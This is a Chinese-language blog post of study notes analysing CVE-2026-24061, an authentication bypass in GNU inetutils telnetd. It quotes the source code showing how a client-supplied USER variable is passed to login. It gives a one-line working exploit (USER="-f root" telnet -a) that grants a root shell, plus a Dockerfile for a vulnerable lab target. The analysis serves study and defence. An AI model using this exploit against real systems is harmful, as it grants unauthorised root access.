Tel me your name——CVE-2026-24061笔记

随便写写，学习一下

---

Tel me your name, and I’ll net your root.

今年年初特别顶级的一个CVE：简单，但是破坏力十足，只需要一行简单的Telnet连接代码就能实现登录认证的绕过，进而得到目标机器的root权限

目前已知受影响的组件是GNU inetutils，受影响版本是从1.9.3到2.7，而且根据NVD - CVE-2026-24061来看好像Debian 11.0也受到了影响，目前已经有补丁了：版本2.7-2

---

万恶起源来自于2015年的一次commit：telnetd: Enable autologin in legacy mode. · fa3245ac8c - inetutils/inetutils - Codeberg.org

我们可以发现改动的不是很多，其中有很多都是一些变量名的更改，但是Changelog里有一段话：

* telnetd/telnetd.c [SOLARIS10] (login_invocation):
Add device path "-d %L" and user name "%U", the latter
in the form of an else clause to the selector "%?u".
[!SOLARIS10] (login_invocation): Likewise for "%U" only.

* telnetd/utility.c (getterminaltype): Change the paramater
name `user_name' to `uname', as the former shadows a precious
and global variable name.
(_var_short_name) <case 'L'>: New case, returning full path
to the PTY device assigned to client.
<case 'U'>: New case, returning a copy of the environment
variable USER, or an empty string.

从下面的详细描述我们可以知道%L主要返回的是pty设备的完整路径，而%U是通过USER这个环境变量获取接下来需要进行登陆的用户

而通过RFC 1572 - Telnet Environment Option，我们可以发现用户是可以利用这个RFC实现环境变量传递的，换句话说就是我们对USER这个变量是完全可控的

接下来我们继续看telnetd.c中进行的变更：

/* Template command line for invoking login program.  */

char *login_invocation =
#ifdef SOLARIS10
  /* TODO: `-s telnet' or `-s ktelnet'.
   *       `-u' takes the Kerberos principal name
   *       of the authenticating, remote user.
   */
  PATH_LOGIN " -p -h %h %?T{-t %T} -d %L %?u{-u %u}{%U}"

#elif defined SOLARIS
  /* At least for SunOS 5.8.  */
  PATH_LOGIN " -h %h %?T{%T} %?u{-- %u}{%U}"

#else /* !SOLARIS */
  PATH_LOGIN " -p -h %h %?u{-f %u}{%U}"
#endif
  ;

其中我们只能通过Changelog和更改记录猜测%U就是USER变量的值：

case 'U':
	return getenv ("USER") ? xstrdup (getenv ("USER")) : xstrdup ("");

但是我们需要实际依据，因此跟踪login_invocation，可以在inetutils/telnetd/pty.c看到这个函数：

void
start_login (char *host, int autologin, char *name)
{
  char *cmd;
  int argc;
  char **argv;

  (void) host;		/* Silence warnings.  Diagnostic use?  */
  (void) autologin;
  (void) name;

  scrub_env ();

  /* Set the environment variable "LINEMODE" to indicate our linemode */
  if (lmodetype == REAL_LINEMODE)
    setenv ("LINEMODE", "real", 1);
  else if (lmodetype == KLUDGE_LINEMODE || lmodetype == KLUDGE_OK)
    setenv ("LINEMODE", "kludge", 1);

  cmd = expand_line (login_invocation);
  if (!cmd)
    fatal (net, "can't expand login command line");
  argcv_get (cmd, "", &argc, &argv);
  execv (argv[0], argv);
  syslog (LOG_ERR, "%s: %m\n", cmd);
  fatalperror (net, cmd);
}

我们可以看到execv就是命令执行的语句，但是我们不确定expand_line以及相关的函数是否会进行一些sanitize，因此稍微看一下，刚好它们都在inetutils/telnetd/utility.c里面（绝对不是我想凑字数(～﹃～)~zZ）

/* Expand a variable referenced by its short one-symbol name.
   Input: exp->cp points to the variable name.
   FIXME: not implemented */
char *
_var_short_name (struct line_expander *exp)
{
  char *q;
  char timebuf[64];
  time_t t;

  switch (*exp->cp++)
    {
    case 'a':
#ifdef AUTHENTICATION
      if (auth_level >= 0 && autologin == AUTH_VALID)
	return xstrdup ("ok");
#endif
      return NULL;

    case 'd':
      time (&t);
      strftime (timebuf, sizeof (timebuf),
		"%l:%M%P on %A, %d %B %Y", localtime (&t));
      return xstrdup (timebuf);

    case 'h':
      return xstrdup (remote_hostname);

    case 'l':
      return xstrdup (local_hostname);

    case 'L':
      return xstrdup (line);

    case 't':
      q = strchr (line + 1, '/');
      if (q)
	q++;
      else
	q = line;
      return xstrdup (q);

    case 'T':
      return terminaltype ? xstrdup (terminaltype) : NULL;

    case 'u':
      return user_name ? xstrdup (user_name) : NULL;

    case 'U':
      return getenv ("USER") ? xstrdup (getenv ("USER")) : xstrdup ("");

    default:
      exp->state = EXP_STATE_ERROR;
      return NULL;
    }
}

/* Expand a variable referenced by its long name.
   Input: exp->cp points to initial '('
   FIXME: not implemented */
char *
_var_long_name (struct line_expander *exp, char *start, int length)
{
  (void) start;		/* Silence warnings until implemented.  */
  (void) length;
  exp->state = EXP_STATE_ERROR;
  return NULL;
}

/* Expand a variable to its value.
   Input: exp->cp points one character _past_ % (or ?) */
char *
_expand_var (struct line_expander *exp)
{
  char *p;
  switch (*exp->cp)
    {
    case '{':
      /* Collect variable name */
      for (p = ++exp->cp; *exp->cp && *exp->cp != '}'; exp->cp++)
	;
      if (*exp->cp == 0)
	{
	  exp->cp = p;
	  exp->state = EXP_STATE_ERROR;
	  break;
	}
      p = _var_long_name (exp, p, exp->cp - p);
      exp->cp++;
      break;

    default:
      p = _var_short_name (exp);
      break;
    }
  return p;
}

/* Expand a conditional block. A conditional block is:
       %?<var>{true-stmt}[{false-stmt}]
   <var> may be either a one-symbol variable name or (string). The latter
   is not handled yet.
   On input exp->cp points to % character */
void
_expand_cond (struct line_expander *exp)
{
  char *p;

  if (*++exp->cp == '?')
    {
      /* condition */
      exp->cp++;
      p = _expand_var (exp);
      if (p)
	{
	  _expand_block (exp);
	  _skip_block (exp);
	}
      else
	{
	  _skip_block (exp);
	  _expand_block (exp);
	}
      free (p);
    }
  else
    {
      p = _expand_var (exp);
      if (p)
	obstack_grow (&exp->stk, p, strlen (p));
      free (p);
    }
}

/* Skip the block. If the exp->cp does not point to the beginning of a
   block ({ character), the function does nothing */
void
_skip_block (struct line_expander *exp)
{
  int level = exp->level;
  if (*exp->cp != '{')
    return;
  for (; *exp->cp; exp->cp++)
    {
      switch (*exp->cp)
	{
	case '{':
	  exp->level++;
	  break;

	case '}':
	  exp->level--;
	  if (exp->level == level)
	    {
	      exp->cp++;
	      return;
	    }
	}
    }
}

/* Expand a block within the formatted line. Stops either when end of source
   line was reached or the nesting reaches the initial value */
void
_expand_block (struct line_expander *exp)
{
  int level = exp->level;
  if (*exp->cp == '{')
    {
      exp->level++;
      exp->cp++;		/*FIXME? */
    }
  while (exp->state == EXP_STATE_CONTINUE)
    {
      for (; *exp->cp && *exp->cp != '%'; exp->cp++)
	{
	  switch (*exp->cp)
	    {
	    case '{':
	      exp->level++;
	      break;

	    case '}':
	      exp->level--;
	      if (exp->level == level)
		{
		  exp->cp++;
		  return;
		}
	      break;

	    case '\\':
	      exp->cp++;
	      break;
	    }
	  obstack_1grow (&exp->stk, *exp->cp);
	}

      if (*exp->cp == 0)
	{
	  obstack_1grow (&exp->stk, 0);
	  exp->state = EXP_STATE_SUCCESS;
	  break;
	}
      else if (*exp->cp == '%' && exp->cp[1] == '%')
	{
	  obstack_1grow (&exp->stk, *exp->cp);
	  exp->cp += 2;
	  continue;
	}

      _expand_cond (exp);
    }
}

/* Expand a format line */
char *
expand_line (const char *line)
{
  char *p = NULL;
  struct line_expander exp;

  exp.state = EXP_STATE_CONTINUE;
  exp.level = 0;
  exp.source = (char *) line;
  exp.cp = (char *) line;
  obstack_init (&exp.stk);
  _expand_block (&exp);
  if (exp.state == EXP_STATE_SUCCESS)
    p = xstrdup (obstack_finish (&exp.stk));
  else
    {
      syslog (LOG_ERR, "can't expand line: %s", line);
      syslog (LOG_ERR, "stopped near %s", exp.cp ? exp.cp : "(END)");
    }
  obstack_free (&exp.stk, NULL);
  return p;
}

好巧不巧，我们可以看到%U正是最下面一层的函数_var_short_name的内容，同时这也只是解析模板并展开的函数，因此也就证明了%U确实就是我们所想的那样，就是USER的值

由此，我们可以发现这就是最经典的命令注入，比如login文件的目录是/usr/bin/login，那么我们的命令就变成了：

/usr/bin/login -p -h <remote_hostname> <USER>

我们搜一下login文件的说明：login(1) - Linux manual page，可以发现-f参数可以直接跳过用户认证，因此假如我们传入USER="-f root"，telnetd就会直接给登录者一个root的shell

由此，我们可以得到一个非常简单的PoC：

USER="-f root" telnet -a <vuln_ipaddr>

目前Github上面已经有一个repo包含从Telnet协议层面构建的完整PoC和一个Docker靶机：GitHub - JayGLXR/CVE-2026-24061-POC

本文末尾的参考网址第1条还对环境变量的任意变更进行了研究，最后确认是传入的任意环境变量都会污染telnetd本身以及它所启动的其它组件的环境变量

当然，既然都能远程提权了，那么实际上还可以实现本地提权，差别只有连接的IP地址，所以我基于上面Github repo的Dockerfile自己搓了一个类似的Dockerfile，随便玩了玩（Telnet端口默认23）：

FROM ubuntu:20.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y inetutils-telnetd xinetd telnet && \
    apt-get clean && \
    rm -rf /var/lib/apt/lists/*

RUN useradd -m -s /bin/bash ctf && \
    echo "ctf:ctfpassword" | chpasswd && \
    echo "root:rootpassword" | chpasswd

RUN echo 'service telnet\n\
{\n\
    disable         = no\n\
    flags           = REUSE\n\
    socket_type     = stream\n\
    wait            = no\n\
    user            = root\n\
    server          = /usr/sbin/telnetd\n\
    server_args     = -h\n\
    log_on_failure  += USERID\n\
}' > /etc/xinetd.d/telnet
RUN echo 'service ctf\n\
{\n\
    disable       = no\n\
    socket_type   = stream\n\
    server        = /usr/bin/bash\n\
    port          = 2333\n\
    protocol      = tcp\n\
    user          = ctf\n\
    wait          = no\n\
    flags         = NODELAY\n\
    type          = UNLISTED\n\
}' > /etc/xinetd.d/ctf

RUN echo 'pts/0' >> /etc/securetty && \
    echo 'pts/1' >> /etc/securetty && \
    echo 'pts/2' >> /etc/securetty

RUN echo 'Aurora{testflag}' > /root/flag.txt

EXPOSE 2333

CMD ["xinetd", "-dontfork"]

感觉实际上可以编一个C binary直接从协议层面发送数据实现提权，这样对靶机内就不刚需telnet或者Python之类的东西了，当然也没细究，毕竟是随便玩玩

参考网址

上面提到的就不再在下面加了

• Root Cause Analysis & PoC Exploit for CVE-2026-24061 | SafeBreach
• CVE-2026-24061 – GNU InetUtils telnetd Authentication Bypass Vulnerability

• 本文作者： 9C±Void
• 本文链接： https://cauliweak9.github.io/2026/02/10/Telnet-CVE-2026/
• 版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！